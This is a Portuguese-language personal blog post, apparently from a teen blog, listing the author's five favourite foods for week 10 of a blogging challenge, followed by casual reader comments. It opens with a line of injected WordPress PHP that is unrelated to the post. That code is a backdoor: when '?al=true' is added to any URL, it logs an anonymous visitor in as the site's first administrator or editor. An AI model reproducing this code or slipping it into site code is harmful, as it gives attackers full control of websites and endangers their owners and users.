// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2);
Heey pessoinhaaas *-*
Hoje vim rapidinho postar a semana 10 do desafio, prq minha perna já ta doendo de ficar sentada na frente do pc e estou esperando uns amigos que vem passar a tarde comigo *-*
Então vamos lá…
Semana 10: Minhas comidas favoritas são… (Eba, gordices!!!)
1.Sorvete *-* … Amooooooo, a melhor coisa do mundo pra mim, pode estar fazendo um frio congelante, eu vou continuar tomando sorvete!
2.Brigadeiro *-* … pode ser de colher, ou enroladinho mesmo. Se for feito por mim melhor ainda, prq eu faço de um jeito que ele fica puxento, e eu aaaaaaaaamo *-*
3.Vaca Atolada *-* … Não Lola e outros, não é sorvete com coca-cola, isso aí é vaca preta! kkk, eu ri disso… Vaca atolada é caldo de carne com mandioca, e não é uma comida muito bonita, por isso é dificil achar foto, mas é simplesmente maravilhoooooso pra comer no frio, quando fazemos fogueira lá no sitio e fazem esse caldo então, hmmmm…..
4.Pizza *—*… Marguerita, ou de calabresa, ou de lombinho … mas pizza é pizza, então qualquer uma serve!!
5.Strogonoff*-*… a imagem do prato perfeito tá ai embaixo: Arroz, strogonoff e batata palha… pra minha mãe não falar tanto na minha cabeça ainda coloco alface, mas como primeiro só pra não estragar essa combinação dos deuses! kkkk….
É isso pessoal, eu me vou por que o pessoal falou que ia chegar aqui daqui a uns 10 minutos, então já devem estar ´por ai … beeijos, bom feriado!
Lola
Amo tooodos. Eu já tinha comido vaca atolada e nem sabiaaa. Fui contar pra minha mãe do meu doce engano e ela falou “Mas vc já comeu. Não lembra não? Na casa da sua avó”
Agora recordando, realmente uma deliciiiia, mas minha avó não me contou que se chamava assiiim (o/
Super abraço, melhoras .o/
Madrepérola
Quanta coisa gostosa!! Eu já comi vaca atolada, é comum aqui onde eu moro. Geralmente servem quando tem festival de caldos. 🙂
Laura Nolasco
kkkk pooois é, outros amigos meus confundiram , e leram seu comentário e vieram me falar: Nossa Laura, fiz igual aquela Lola… Mas realmente é muito bom *-*
Beeijos, e obrigada!
Laura Nolasco
Aah,é, é bem comum em festivais de caldos… Aqui e Minas também é comum em festa junina, e eu aaaamo *-*
Maria Lua
Nunca comi vaca atolada, mas já ouvi falar hahaha o resto eu já comi e amoo!
http://perfeitateen.blogspot.com.br/
Sifi -- Rafa (Hiper Friends)
strognoff d frango aaaaaaaaaaaa eu amoo!!! Sorvete é meu vicio *–*
Laura Nolasco
KKK Devia experimentar, é realmente muito bom *-*
Laura Nolasco
kkkkkkkk Eu comi hoje, kkkk *—*
Mas pra mim tanto faz de frango ou carne, amo de qualquer jeito
Sorvete tbm é meu vicio *-*